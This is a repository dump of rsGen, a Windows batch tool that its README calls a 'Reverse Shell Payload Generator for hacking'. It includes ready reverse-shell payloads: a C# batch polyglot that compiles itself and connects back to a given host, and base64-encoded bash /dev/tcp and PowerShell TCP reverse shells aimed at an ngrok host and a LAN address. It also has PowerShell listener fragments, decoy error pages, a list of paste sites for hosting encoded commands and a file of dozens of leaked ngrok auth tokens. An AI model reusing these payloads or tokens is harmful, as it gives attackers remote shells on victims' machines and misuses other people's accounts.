├── .gitattributes ├── README.md ├── Screenshot ├── donate-btc.png ├── donate-doge.png ├── donate-eth.png ├── donate-xmr.png ├── rsgen-ngrok.png ├── rsgen-pgrok.png └── rsgen.png ├── include ├── curl-ca-bundle.crt ├── curl.exe ├── mongoose.exe ├── ngrok.exe ├── ngrok.yml ├── pgrok.exe ├── rs_ngrok.localation ├── rs_ngrok.token ├── rs_pastebin.api ├── wincat.exe └── www │ ├── 404.html │ ├── c │ ├── i │ └── index.html ├── payload ├── c#.payload ├── powershell_listener_1.payload ├── powershell_listener_2.payload └── rs_base64.payload ├── rsGen.bat └── runcmd.bat /.gitattributes: -------------------------------------------------------------------------------- 1 | * linguist-vendored 2 | *.bat linguist-language=Flyfish 3 | # In general, use LF for text 4 | * text eol=crlf 5 | 6 | # Windows CMD does not like LF in batch files 7 | *.bat text eol=crlf 8 | *.cmd text eol=crlf 9 | 10 | # Visual Studio solutions like to switch to CRLF at times 11 | *.sln text eol=crlf 12 | 13 | *.ai binary 14 | *.aiff binary 15 | *.dll binary 16 | *.eot binary 17 | *.exe binary 18 | *.jar binary 19 | *.jpg binary 20 | *.gif binary 21 | *.mp3 binary 22 | *.o binary 23 | *.pdf binary 24 | *.png binary 25 | *.psd binary 26 | *.so binary 27 | *.ttf binary 28 | *.winmd binary 29 | *.zip binary -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | 2 | # This tool has been ported to python.Considering cross-platform use, I reimplemented it in python with multiple improvements.[rcX](https://github.com/FlyfishSec/rcX "rcX") 3 | rsGen - Reverse Shell Payload Generator. 4 | = 5 | 6 | rsGen is a Reverse Shell Payload Generator for hacking. I write through windows batch. The main features include native command generation and variant command generation. In version 2.0, I added a tcp tunnel feature to receive shell("-ngrok" and "-pgrok"). 7 | 8 | I will be constantly updating this tool, if you have found any bugs or issues, please let me know via GitHub Issues and i will try my best to get it resolved quickly. 9 | 10 | ![rsGen](https://raw.githubusercontent.com/FlyfishSec/rsGen/master/Screenshot/rsgen.png "rsGen") 11 | 12 | ## Usage 13 | 14 | 15 | ``` 16 | 17 | -pub Generate a "variant command".Use this parameter,the Command will be encoded upload to the 18 | public pastebin website. 19 | 20 | -lan In some cases, the target machine cannot request an external network.This parameter will call 21 | mongoose.exe in the command directory(a mini web server, only 144kb, see the website: 22 | https://cesanta.com/), enable a web service on the local port 80 for command request execution. 23 | After the end, you need to manually exit it. 24 | 25 | -listen Start port listening locally to receive shell that bounce back.Start port listening locally 26 | to receive a shell that bounces back, Function equivalent to the netcat (call powercat.ps1). 27 | 28 | -ngrok Start ngrok TCP Tunnel(Contains -pub, -listen options). 29 | 30 | -pgrok Start pgrok TCP Tunnel(Contains -pub, -listen options).like ngrok but free and unlimited. 31 | 32 | ``` 33 | ![rsGen](https://raw.githubusercontent.com/FlyfishSec/rsGen/master/Screenshot/rsgen-ngrok.png "rsGen-ngrok") 34 | 35 | 36 | ## Operating system 37 | 38 | Windows 7 or higher Windows operating system. 39 | 40 | ## Donations 41 | 42 | Bitcoin Address QR Code | Ethereum Address QR Code | Monero Address QR Code | DOGECOIN Address QR Code 43 | :-------------------------:|:-------------------------:|:-------------------------:|:-------------------------: 44 | | | | 45 | 46 | **BTC**: 3F2R6KMXbJ576yJNJpjrBnhVG64Ltg1WoF 47 | 48 | **ETH**: 0xab15323b0c7721B6B9fDf5A8089a6Ec697C9feED 49 | 50 | **XMR**: 48rBRHh2iV27oHzXMGnjbwCLLyinpqFry6gLTAaQiFVtMRw4kqabeoFiBYqNAPCBHbKjgQezPNLwDihMSNbEPCuYP1xzCWi 51 | 52 | **Dogecoin**: DBQATuB7t4wk56dwFqcGdqQtY8BSjL77if 53 | 54 | 55 | -------------------------------------------------------------------------------- /Screenshot/donate-btc.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/FlyfishSec/rsGen/e91ff18035726d2330d5b264986d742f4a2b53eb/Screenshot/donate-btc.png -------------------------------------------------------------------------------- /Screenshot/donate-doge.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/FlyfishSec/rsGen/e91ff18035726d2330d5b264986d742f4a2b53eb/Screenshot/donate-doge.png -------------------------------------------------------------------------------- /Screenshot/donate-eth.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/FlyfishSec/rsGen/e91ff18035726d2330d5b264986d742f4a2b53eb/Screenshot/donate-eth.png -------------------------------------------------------------------------------- /Screenshot/donate-xmr.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/FlyfishSec/rsGen/e91ff18035726d2330d5b264986d742f4a2b53eb/Screenshot/donate-xmr.png -------------------------------------------------------------------------------- /Screenshot/rsgen-ngrok.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/FlyfishSec/rsGen/e91ff18035726d2330d5b264986d742f4a2b53eb/Screenshot/rsgen-ngrok.png -------------------------------------------------------------------------------- /Screenshot/rsgen-pgrok.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/FlyfishSec/rsGen/e91ff18035726d2330d5b264986d742f4a2b53eb/Screenshot/rsgen-pgrok.png -------------------------------------------------------------------------------- /Screenshot/rsgen.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/FlyfishSec/rsGen/e91ff18035726d2330d5b264986d742f4a2b53eb/Screenshot/rsgen.png -------------------------------------------------------------------------------- /include/curl.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/FlyfishSec/rsGen/e91ff18035726d2330d5b264986d742f4a2b53eb/include/curl.exe -------------------------------------------------------------------------------- /include/mongoose.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/FlyfishSec/rsGen/e91ff18035726d2330d5b264986d742f4a2b53eb/include/mongoose.exe -------------------------------------------------------------------------------- /include/ngrok.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/FlyfishSec/rsGen/e91ff18035726d2330d5b264986d742f4a2b53eb/include/ngrok.exe -------------------------------------------------------------------------------- /include/ngrok.yml: -------------------------------------------------------------------------------- 1 | authtoken: 1gYNGCw1ZRgzRTMckejZJ68fbOe_3dFZJfLuA8tTseLCmjYWK 2 | web_addr: 44480 3 | region: eu 4 | -------------------------------------------------------------------------------- /include/pgrok.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/FlyfishSec/rsGen/e91ff18035726d2330d5b264986d742f4a2b53eb/include/pgrok.exe -------------------------------------------------------------------------------- /include/rs_ngrok.localation: -------------------------------------------------------------------------------- 1 | us 2 | eu 3 | ap 4 | au 5 | sa 6 | jp 7 | in 8 | -------------------------------------------------------------------------------- /include/rs_ngrok.token: -------------------------------------------------------------------------------- 1 | 1pqNPomgd8IS4MEVD5ixWqbynci_7qPUV8PQ9bZhDhR23gvBq 2 | 1qkMMduBOzDEEZgbvTVUmiF7B88_2cnTe8GN5Y5NKEnf3v96v 3 | 1qkMTtorRJtQDjKaDHgDBhVqxM0_5MRgzGZYWsj3erkEofNzP 4 | 1qkMaSjkfmgny4tdNGhw8CEltWL_xNoKtdnwNyghiFPggPPK 5 | 1qkMiQpj3dP83wslTIrpVeFPc2P_2JedvtPZP9tgEL8TRUZY7 6 | 1qy8l5CLlOReT6tdDQiLxjyP90t_5A2Mc1aDaMrRkgrJPrkr1 7 | 1qy8z9ocvupU4tvUkE5kqkqcsZV_85J6MPTGcS4Rggdis1pcp 8 | 1qy94dBcvwd374dgP193PgICJSA_PKeJNMeNVNpNcUB7bF5h 9 | 1qy9GGSEPceSauamoSkkNh33rt6_4wuUew44A9AUA11smYA73 10 | 1qy9LEnNIg8flHTCKTxlQa8WTh8_5bAiVqS8HRjde2wJFrqBv 11 | 1qy9b5E3lum6PNHdm1Qulr6FD2k_5hiMUc4JFXwZqQ9ikNa4D 12 | 1qy9fbkr6sXDsezmNu4cfOPxF7E_4geScFHCAeBMsPD3hkyPm 13 | 1qy9UWz7N5bH7Ca7W8tsdKMUTiP_3Mv3HxQdXtaEjb7wrrc2Z 14 | 5S28rBKgc22ZW7evyedNT_YvEm15RZSHdXgS4QwYbk 15 | 9AZ7RJuLDUAqTz8XLZE5_6ts5kTWCvvE5o5BdT5jyE 16 | 46BUGD4XhUPTaHq7XJBwv_7e1PZUn5Qm6Z2735i64UN 17 | 1hpf39YX2qCXqAkMMcRLC0L4ww9_2VWg1CdHXGjcgnoJH2qEf 18 | 1UqHsShi6o3ketf426P5UtVdTfs_5XFD6sFRMkryka8fAbLd3 19 | LsVZFxFqgxA4h7ibWV9V_iuA9afbQwaSnGqH9dApL 20 | 1hvRf0LvwuAI0SoCfB5J0Cnz02c_qY8Pfk5HRkxqgZ8UFHdg 21 | 4rYuvATyw19Cmk3yuxJDe_4SssNTEb27EE1U4es17pJ 22 | 1PxZ5EqEBmPYYxU7lbUYCRNdJlg_5DewYd2sVASo8ZdkmAjoU 23 | 1PCjTlVFtehbP0GW82CHfXHqps8_QmreDNWDUTwtH2UcD75k 24 | 7uG3wZjvvSXZYMW36LYe3_4hRc6nbzby7aR42FMZuuU 25 | 1hdFJmQC6iIak1eSbqx1t7Rrx56_2JLpasDVHybBixWv7Xftm 26 | 3F3eLQRVsUG5gqVPTND3A_2vXXtPCjK3TnnEazxHE7a 27 | 5ioHp3Qr1ztsMz9adXTH7_5GF6YTpEnczVrjGvmyd6R 28 | 1gYNGCw1ZRgzRTMckejZJ68fbOe_3dFZJfLuA8tTseLCmjYWK 29 | 3GPmfV8eVwG7Y49T49j2F_5aazjk48owqKA9JJZNs4f 30 | KuTKRosrawrDMAgX1ayq_7AAmsVSom4E6GtT18S1pn 31 | 1WRKv6pwjZ0pbjSFpmDVrB3th2d_72o6qVZRRJNHe4UBnLRDM 32 | 1iVFNceiOYs6PP0VAIJgdktetio_5qWxix3dLLsdFKptGsQs5 33 | 1X7aYWPuFKYzvewLbnNoMo71kZi_2uzbB966Q4TU5cpgNPKhy 34 | 7LE18LK8zeaDYeybp5fKP_6GNG1oHEfhTnQE7s9qpw 35 | 1Qe1IeySOQWSTnpQ3eFfr8j7Oi5_2zhanqnpZwHBhsfANd6yf 36 | 1XJNNnG8kZsPjjFmLsYNWCC0gIo_7VpBhwTcvhiuK4o2G2jbt 37 | 1XzP70k7YVrg7MMaHQWPks0Q8Za_7y6b1mTDJDmJWcuqt5qTp 38 | 1Y14GB7E4acXxWYnVTiBejgnLuV_853z7mAgaTJxE9KY3HnCW 39 | 1XkoKNLcyiPECcQfGUjrTVzN64P_7tv2YgC4DSnazyVtpCpHm 40 | 1Xc7z0uHxDoI9Ah06EQKgH61zoP_6WTPXDGvjFmcp2o7gNmqa 41 | 1qkMq4p644qXcWVwWiYv6S64ln2_u64XDeKZ9iQdLA5UjHx8 42 | 1qkMwgB5wIsj29z3dKnxFpMmrVr_3cvychXo3FofX3XNeV14G 43 | 3c4WZaxPbjeRwRibY5opU_2N4TTRKaDubtEWMeKkFXn 44 | 3fW4eXHdUN3ziCBXcahZ_3tnDdaTyLw8tKzJtKZkLp 45 | 3CqeFZQht43cG5Z2YKfyv_6aKTrgrbo1HtyRi78hRKK 46 | 1RCQwctVjSz8AIzHO6S55jm8XB8_5N6PqyZVnoN7mUVqF1yvT 47 | 1XTxsRKP8XyxvaJigX9XFXU2FvK_4dqzLxNRJHBz8A3aoPC85 48 | 3Y8YSw6bvC9CsbYeRczmt_8akMuLYA3bAUshP1NCMnW 49 | 1XSYq8gmxzNgMlYQzERmC50uBot_6qURZnj43KsYF2GWaUamm 50 | 1SCsbuawjv9d79jlhlfNljaFTaB_5heVkcR6C7Sk8UBaQ1U1C 51 | 1Q6smHt4Bzz9VEXTwj3a7p5Gdx2_5mp6ivT6N6nB3YmRHUEM3 52 | 7VJwGkCTTUubiGhgz6Gv6_5fMLganRSKj9ntdefnF5o 53 | 3VnrrXDQVHoNp9HvHFhqX_3X4JExwm6L9n6w4ppL1qy 54 | 1ShshNwfhQcyOqlMjnBDVE5X5jC_3WAmzomMHAgkunka4dSck 55 | 772yFAui6ynH9AYx29HHS_5Xcr88pHtPTQLwewv7Ctk 56 | 1T750atJi3xccndeUqJ4ewiS62o_2s6f8GUccL1qDUXTGSftN 57 | 1QUysRUo97w5mdB6sCZvTTMM0aK_3unoMs6nYd7grgCkuhbj3 58 | 5eMywZLisJNdybqpFLVgs_4XQDeF3YCMHu1Ybf7mVE6 59 | 4Cg1cEwCT7Ek89zT4VcdB_4GPAjMFgu6nhwY7SxQm94 60 | 1SGs4s9NrhxP9FRURszjL1nITSv_otcpfpb6aMVEL13u3dv1 61 | 1SuK2ukM9Z4NohoJbU9224uMzXr_6h1ABdCrJU2EviZv4RN4r 62 | 7ecmt2Kux5uYsTUHrrqGU_3W9CJnaSeSyxiwkjxNhHc 63 | 2DXURjrUhAZZNMhqN5m1F_6HHzejcfRecP8upwJnNBd -------------------------------------------------------------------------------- /include/rs_pastebin.api: -------------------------------------------------------------------------------- 1 | https://p.ip.fi/ 2 | https://dpaste.com/api/v2/ 3 | https://ghostbin.co/paste/new 4 | https://paste.teknik.io/Action/Paste 5 | -------------------------------------------------------------------------------- /include/wincat.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/FlyfishSec/rsGen/e91ff18035726d2330d5b264986d742f4a2b53eb/include/wincat.exe -------------------------------------------------------------------------------- /include/www/404.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 123 | 124 | 无法访问此页面 125 | 127 | 129 | 130 | 131 | 132 |
133 |
无法访问此页面
134 |
135 | 140 | 147 |
148 |
149 | 150 | 151 | 154 | 155 |
152 | 详细信息 153 |
156 |
157 |

找不到此网站。

158 |

错误代码: INET_E_RESOURCE_NOT_FOUND

159 |
160 |
161 |
162 |
163 |
164 |
165 | 166 | 167 | -------------------------------------------------------------------------------- /include/www/c: -------------------------------------------------------------------------------- 1 | /*&cls&@echo off&set "$=%systemroot%\Microsoft.NET\Framework"&for /f "delims=" %%i in ('dir /ad /b "%$%\v?.*"') do (if exist "%$%\%%i\csc.exe" (set "$$=%$%\%%i\csc.exe" del /q %tmp%\$.exe&"%$$%" /nologo /out:"%tmp%\$.exe" "%~f0"&&%tmp%\$.exe %1 %2 %3&exit /b 0))&*/using System;using System.IO;using System.Net;using System.Net.Sockets;using System.Text;using System.Diagnostics;public class cs{public static TcpClient tcpClient; public static NetworkStream stream; public static StreamReader streamReader; public static StreamWriter streamWriter; public static StringBuilder UserInput; public static void Main(string[] args){tcpClient=new TcpClient();UserInput=new StringBuilder();if (!tcpClient.Connected){try{tcpClient.Connect(args[0].ToString(),Convert.ToInt32(args[1]));stream=tcpClient.GetStream();streamReader=new StreamReader(stream,System.Text.Encoding.Default);streamWriter=new StreamWriter(stream,System.Text.Encoding.Default);}catch (Exception){return;}Process CmdProc;CmdProc=new Process();CmdProc.StartInfo.FileName=args[2].ToString();CmdProc.StartInfo.UseShellExecute=false;CmdProc.StartInfo.RedirectStandardInput=true;CmdProc.StartInfo.RedirectStandardOutput=true;CmdProc.StartInfo.RedirectStandardError=true;CmdProc.OutputDataReceived += new DataReceivedEventHandler(SortOutputHandler);CmdProc.ErrorDataReceived += new DataReceivedEventHandler(SortOutputHandler);CmdProc.Start();CmdProc.BeginOutputReadLine();CmdProc.BeginErrorReadLine();while (true){try{UserInput.Append(streamReader.ReadLine());CmdProc.StandardInput.WriteLine(UserInput);UserInput.Remove(0,UserInput.Length);}catch (Exception){streamReader.Close();streamWriter.Close();CmdProc.Kill();break;}}}}public static void SortOutputHandler(object sendingProcess,DataReceivedEventArgs outLine){StringBuilder strOutput=new StringBuilder();if (!String.IsNullOrEmpty(outLine.Data)){try{strOutput.Append(outLine.Data);streamWriter.WriteLine(strOutput);streamWriter.Flush();}catch (Exception){}}}}/*>nul 2>nul&*/ -------------------------------------------------------------------------------- /include/www/i: -------------------------------------------------------------------------------- 1 | L2Jpbi9iYXNoIC1pPiYvZGV2L3RjcC8xOTIuMTY4LjExLjEvODg4OCAwPiYx&powershell -EP Bypass -NoLogo -NonI -NoP -Enc JABjAHQAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACcAMQA5ADIALgAxADYAOAAuADEAMQAuADEAJwAsADgAOAA4ADgAKQA7ACQAcwB0AD0AJABjAHQALgBHAGUAdABTAHQAcgBlAGEAbQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AJABiAHQAPQAwAC4ALgA2ADUANQAzADUAfAAlAHsAMAB9ADsAdwBoAGkAbABlACgAKAAkAGkAPQAkAHMAdAAuAFIAZQBhAGQAKAAkAGIAdAAsACAAMAAsACAAJABiAHQALgBMAGUAbgBnAHQAaAApACkAIAAtAG4AZQAgADAAKQB7ADsAJABkAGEAdABhAD0AKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAALQBUAHkAcABlAE4AYQBtAGUAIABTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBBAFMAQwBJAEkARQBuAGMAbwBkAGkAbgBnACkALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAYgB0ACwAMAAsACAAJABpACkAOwAkAHMAYgA9ACgAaQBlAHgAIAAkAGQAYQB0AGEAIAAyAD4AJgAxAHwATwB1AHQALQBTAHQAcgBpAG4AZwAgACkAOwAkAHMAYgAyACAAPQAkAHMAYgArACgAcAB3AGQAKQAuAFAAYQB0AGgAKwAnAD4AJwA7ACQAcwBkAD0AKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAkAHMAYgAyACkAOwAkAHMAdAAuAFcAcgBpAHQAZQAoACQAcwBkACwAMAAsACQAcwBkAC4ATABlAG4AZwB0AGgAKQA7ACQAcwB0AC4ARgBsAHUAcwBoACgAKQB9ADsAJABjAHQALgBDAGwAbwBzAGUAKAApAA== 2 | -------------------------------------------------------------------------------- /include/www/index.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 123 | 124 | 无法访问此页面 125 | 127 | 129 | 130 | 131 | 132 |
133 |
无法访问此页面
134 |
135 | 140 | 147 |
148 |
149 | 150 | 151 | 154 | 155 |
152 | 详细信息 153 |
156 |
157 |

找不到此网站。

158 |

错误代码: INET_E_RESOURCE_NOT_FOUND

159 |
160 |
161 |
162 |
163 |
164 |
165 | 166 | 167 | -------------------------------------------------------------------------------- /payload/c#.payload: -------------------------------------------------------------------------------- 1 | /*&cls&@echo off&set "$=%systemroot%\Microsoft.NET\Framework"&for /f "delims=" %%i in ('dir /ad /b "%$%\v?.*"') do (if exist "%$%\%%i\csc.exe" (set "$$=%$%\%%i\csc.exe" del /q %tmp%\$.exe&"%$$%" /nologo /out:"%tmp%\$.exe" "%~f0"&&%tmp%\$.exe %1 %2 %3&exit /b 0))&*/using System;using System.IO;using System.Net;using System.Net.Sockets;using System.Text;using System.Diagnostics;public class cs{public static TcpClient tcpClient; public static NetworkStream stream; public static StreamReader streamReader; public static StreamWriter streamWriter; public static StringBuilder UserInput; public static void Main(string[] args){tcpClient=new TcpClient();UserInput=new StringBuilder();if (!tcpClient.Connected){try{tcpClient.Connect(args[0].ToString(),Convert.ToInt32(args[1]));stream=tcpClient.GetStream();streamReader=new StreamReader(stream,System.Text.Encoding.Default);streamWriter=new StreamWriter(stream,System.Text.Encoding.Default);}catch (Exception){return;}Process CmdProc;CmdProc=new Process();CmdProc.StartInfo.FileName=args[2].ToString();CmdProc.StartInfo.UseShellExecute=false;CmdProc.StartInfo.RedirectStandardInput=true;CmdProc.StartInfo.RedirectStandardOutput=true;CmdProc.StartInfo.RedirectStandardError=true;CmdProc.OutputDataReceived += new DataReceivedEventHandler(SortOutputHandler);CmdProc.ErrorDataReceived += new DataReceivedEventHandler(SortOutputHandler);CmdProc.Start();CmdProc.BeginOutputReadLine();CmdProc.BeginErrorReadLine();while (true){try{UserInput.Append(streamReader.ReadLine());CmdProc.StandardInput.WriteLine(UserInput);UserInput.Remove(0,UserInput.Length);}catch (Exception){streamReader.Close();streamWriter.Close();CmdProc.Kill();break;}}}}public static void SortOutputHandler(object sendingProcess,DataReceivedEventArgs outLine){StringBuilder strOutput=new StringBuilder();if (!String.IsNullOrEmpty(outLine.Data)){try{strOutput.Append(outLine.Data);streamWriter.WriteLine(strOutput);streamWriter.Flush();}catch (Exception){}}}}/*>nul 2>nul&*/ -------------------------------------------------------------------------------- /payload/powershell_listener_1.payload: -------------------------------------------------------------------------------- 1 | $ct=New-Object System.Net.Sockets.TCPClient('' -------------------------------------------------------------------------------- /payload/powershell_listener_2.payload: -------------------------------------------------------------------------------- 1 | );$st=$ct.GetStream();[byte[]]$bt=0..65535|%{0};while(($i=$st.Read($bt, 0, $bt.Length)) -ne 0){;$data=(New-Object -TypeName System.Text.ASCIIEncoding).GetString($bt,0, $i);$sb=(iex $data 2>&1|Out-String );$sb2 =$sb+(pwd).Path+''>'';$sd=([text.encoding]::ASCII).GetBytes($sb2);$st.Write($sd,0,$sd.Length);$st.Flush()};$ct.Close() -------------------------------------------------------------------------------- /payload/rs_base64.payload: -------------------------------------------------------------------------------- 1 | L2Jpbi9iYXNoIC1pPiYvZGV2L3RjcC8wLnRjcC5qcC5uZ3Jvay5pby8xNDQ2NCAwPiYx&powershell -EP Bypass -NoLogo -NonI -NoP -Enc JABjAHQAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACcAMAAuAHQAYwBwAC4AagBwAC4AbgBnAHIAbwBrAC4AaQBvACcALAAxADQANAA2ADQAKQA7ACQAcwB0AD0AJABjAHQALgBHAGUAdABTAHQAcgBlAGEAbQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AJABiAHQAPQAwAC4ALgA2ADUANQAzADUAfAAlAHsAMAB9ADsAdwBoAGkAbABlACgAKAAkAGkAPQAkAHMAdAAuAFIAZQBhAGQAKAAkAGIAdAAsACAAMAAsACAAJABiAHQALgBMAGUAbgBnAHQAaAApACkAIAAtAG4AZQAgADAAKQB7ADsAJABkAGEAdABhAD0AKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAALQBUAHkAcABlAE4AYQBtAGUAIABTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBBAFMAQwBJAEkARQBuAGMAbwBkAGkAbgBnACkALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAYgB0ACwAMAAsACAAJABpACkAOwAkAHMAYgA9ACgAaQBlAHgAIAAkAGQAYQB0AGEAIAAyAD4AJgAxAHwATwB1AHQALQBTAHQAcgBpAG4AZwAgACkAOwAkAHMAYgAyACAAPQAkAHMAYgArACgAcAB3AGQAKQAuAFAAYQB0AGgAKwAnAD4AJwA7ACQAcwBkAD0AKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAkAHMAYgAyACkAOwAkAHMAdAAuAFcAcgBpAHQAZQAoACQAcwBkACwAMAAsACQAcwBkAC4ATABlAG4AZwB0AGgAKQA7ACQAcwB0AC4ARgBsAHUAcwBoACgAKQB9ADsAJABjAHQALgBDAGwAbwBzAGUAKAApAA== 2 | -------------------------------------------------------------------------------- /rsGen.bat: -------------------------------------------------------------------------------- 1 | @echo off 2 | title rsGen - Reverse Shell Payload Generator 3 | 4 | ::main 5 | :rs_main_start 6 | setlocal enableDelayedExpansion 7 | call :rs_os_detect_start 8 | if "%~1" equ "" ( 9 | if "!rs_os_flag!"=="W10" ( 10 | call :rs_banner_w10_start 11 | ) else ( 12 | call :rs_banner_w7_start 13 | ) 14 | goto rs_help_start 15 | ) else ( 16 | set rs_listen_host=%~1 17 | 18 | if "%~2" equ "" ( 19 | if "!rs_os_flag!"=="W10" ( 20 | call :rs_banner_w10_start 21 | echo,&echo -Missing port argument 22 | ) else ( 23 | call :rs_banner_w7_start 24 | echo, 25 | powershell -c write-host "' - Missing port argument'" -f red -n 2>nul 26 | ) 27 | goto rs_help_start 28 | ) else ( 29 | set rs_listen_port=%~2 30 | 31 | if /i "%2"=="-ngrok" ( 32 | set rs_ngrok= 33 | set rs_listen_port=%~1 34 | 35 | if "!rs_os_flag!"=="W10" ( 36 | call :rs_banner_w10_start 37 | ) else ( 38 | call :rs_banner_w7_start 39 | ) 40 | 41 | call :rs_local_listen_start %~1 42 | call :rs_ngrok_start 43 | 44 | if !rs_ngrok! == 0 ( 45 | call :rs_command_generate_pub_start !rs_ngrok_host! !rs_ngrok_port! 46 | ) else ( 47 | powershell -c write-host "' - Get ngrok tunnel url timeout,Please make sure you are connected to the internet and try again.'" -f red -n 2>nul 48 | echo, 49 | goto :eof 50 | ) 51 | 52 | if "!rs_os_flag!"=="W10" ( 53 | call :rs_info_w10windows_start 54 | call :rs_windows_command_raw_start !rs_ngrok_host! !rs_ngrok_port! 55 | call :rs_command_generate_pub_output_windowsw10_start 56 | call :rs_info_w10linux_start 57 | call :rs_linux_command_raw_start !rs_ngrok_host! !rs_ngrok_port! 58 | call :rs_command_generate_pub_output_linuxw10_start 59 | call :rs_info_wlinux10_start 60 | call :rs_command_generate_pub_output_wl10_start 61 | goto :eof 62 | ) else ( 63 | call :rs_info_w7windows_start 64 | call :rs_windows_command_raw_start !rs_ngrok_host! !rs_ngrok_port! 65 | call :rs_command_generate_pub_output_windowsw7_start 66 | call :rs_info_w7linux_start 67 | call :rs_linux_command_raw_start !rs_ngrok_host! !rs_ngrok_port! 68 | call :rs_command_generate_pub_output_linuxw7_start 69 | call :rs_info_wlinux7_start 70 | call :rs_command_generate_pub_output_wl7_start 71 | goto :eof 72 | ) 73 | 74 | ) 75 | 76 | if /i "%2"=="-pgrok" ( 77 | set rs_pgrok= 78 | set rs_listen_port=%~1 79 | 80 | if "!rs_os_flag!"=="W10" ( 81 | call :rs_banner_w10_start 82 | ) else ( 83 | call :rs_banner_w7_start 84 | ) 85 | 86 | call :rs_local_listen_start %~1 87 | call :rs_pgrok_start 88 | 89 | if !rs_pgrok! == 0 ( 90 | call :rs_command_generate_pub_start !rs_pgrok_host! !rs_pgrok_port! 91 | ) else ( 92 | powershell -c write-host "' - Get pgrok tunnel url timeout.'" -f red -n 2>nul 93 | echo, 94 | goto :eof 95 | ) 96 | 97 | if "!rs_os_flag!"=="W10" ( 98 | call :rs_info_w10windows_start 99 | call :rs_windows_command_raw_start !rs_pgrok_host! !rs_pgrok_port! 100 | call :rs_command_generate_pub_output_windowsw10_start 101 | call :rs_info_w10linux_start 102 | call :rs_linux_command_raw_start !rs_pgrok_host! !rs_pgrok_port! 103 | call :rs_command_generate_pub_output_linuxw10_start 104 | call :rs_info_wlinux10_start 105 | call :rs_command_generate_pub_output_wl10_start 106 | goto :eof 107 | ) else ( 108 | call :rs_info_w7windows_start 109 | call :rs_windows_command_raw_start !rs_pgrok_host! !rs_pgrok_port! 110 | call :rs_command_generate_pub_output_windowsw7_start 111 | call :rs_info_w7linux_start 112 | call :rs_linux_command_raw_start !rs_pgrok_host! !rs_pgrok_port! 113 | call :rs_command_generate_pub_output_linuxw7_start 114 | call :rs_info_wlinux7_start 115 | call :rs_command_generate_pub_output_wl7_start 116 | goto :eof 117 | ) 118 | 119 | ) 120 | 121 | call :rs_check_port_start !rs_listen_port! 122 | if "!rs_value_type!"=="1" ( 123 | if "!rs_os_flag!"=="W10" ( 124 | call :rs_banner_w10_start 125 | echo,&echo -Wrong port argument 126 | ) else ( 127 | call :rs_banner_w7_start 128 | echo, 129 | powershell -c write-host "' - Wrong port argument'" -f red -n 2>nul 130 | ) 131 | goto rs_help_start 132 | ) else ( 133 | set rs_webport=80 134 | 135 | if not "%3"=="" ( 136 | for %%i in (%3 %4 %5 %6 %7 %8) do ( 137 | if /i "%%i"=="-pub" ( 138 | if "!rs_os_flag!"=="W10" ( 139 | call :rs_banner_w10_start 140 | echo + Host:Port ^<==^> %~1:%~2 141 | call :rs_command_generate_pub_start %~1 %~2 142 | call :rs_info_w10windows_start 143 | call :rs_command_generate_pub_output_windowsw10_start 144 | call :rs_info_w10linux_start 145 | call :rs_command_generate_pub_output_linuxw10_start 146 | call :rs_info_wlinux10_start 147 | call :rs_command_generate_pub_output_wl10_start 148 | ) else ( 149 | call :rs_banner_w7_start 150 | echo + Host:Port ^<==^> %~1:%~2 151 | call :rs_command_generate_pub_start %~1 %~2 152 | call :rs_info_w7windows_start 153 | call :rs_command_generate_pub_output_windowsw7_start 154 | call :rs_info_w7linux_start 155 | call :rs_command_generate_pub_output_linuxw7_start 156 | call :rs_info_wlinux7_start 157 | call :rs_command_generate_pub_output_wl7_start 158 | ) 159 | ) 160 | if /i "%%i"=="-lan" ( 161 | if "!rs_os_flag!"=="W10" ( 162 | call :rs_banner_w10_start 163 | ) else ( 164 | call :rs_banner_w7_start 165 | ) 166 | call :rs_command_lan_start %~1 %~2 167 | ) 168 | if /i "%%i"=="-listen" ( 169 | call :rs_local_listen_start %~2 170 | ) 171 | 172 | if /i "%%i"=="-ngrok" ( 173 | if "!rs_os_flag!"=="W10" ( 174 | call :rs_banner_w10_start 175 | ) else ( 176 | call :rs_banner_w7_start 177 | ) 178 | echo Please try "%~nx0 -ngrok" 179 | goto rs_help_start 180 | ) 181 | 182 | if /i "%%i"=="-pgrok" ( 183 | if "!rs_os_flag!"=="W10" ( 184 | call :rs_banner_w10_start 185 | ) else ( 186 | call :rs_banner_w7_start 187 | ) 188 | echo Please try "%~nx0 -pgrok" 189 | goto rs_help_start 190 | ) 191 | ) 192 | 193 | ) else ( 194 | if not "%2"=="-ngrok" ( 195 | if not "%2"=="-pgrok" ( 196 | if "!rs_os_flag!"=="W10" ( 197 | call :rs_banner_w10_start 198 